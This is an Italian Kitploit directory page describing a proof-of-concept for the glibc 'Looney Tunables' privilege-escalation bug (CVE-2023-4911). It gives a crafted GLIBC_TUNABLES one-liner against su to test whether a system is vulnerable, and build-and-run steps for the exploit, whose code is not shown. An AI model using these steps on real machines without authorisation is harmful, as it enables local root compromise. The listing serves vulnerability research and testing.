Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
looney-tunables-CVE-2023-4911 | Kitploit
Strumenti/GitHubGitHub/hadrian3689/looney-tunables-cve-2023-4911
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubhadrian3689/looney-tunables-cve-2023-4911

looney-tunables-CVE-2023-4911

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
2962 anni faRevisionato da Kitploit

PoC di CVE-2023-4911 Looney Tunables

Questa è una PoC di CVE-2023-4911 (noto anche come "Looney Tunables") che sfrutta un bug nella funzione parse_tunables() del dynamic loader di glibc, usata per il parsing della variabile d'ambiente GLIBC_TUNABLES.

Per iniziare

Esecuzione del programma

  • Possiamo verificare se il target è vulnerabile
root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
  • Se otteniamo un Segmentation fault (core dumped) allora abbiamo a che fare con un target vulnerabile.

Esecuzione del programma

  • Crea il file libc.so.6
root@kitploit:~
python3 libc.py
  • Compila l'exploit
root@kitploit:~
gcc exp.c -o exp

Esclusione di responsabilità

Tutto il codice fornito in questo repository è esclusivamente a scopo educativo/di ricerca. Qualsiasi azione e/o attività relativa al materiale contenuto in questo repository è di esclusiva responsabilità dell'utente. L'uso improprio del codice in questo repository può comportare accuse penali a carico delle persone coinvolte. L'autore non sarà ritenuto responsabile nell'eventualità che vengano mosse accuse penali contro individui che utilizzano impropriamente il codice di questo repository per infrangere la legge.

Scarica lo strumento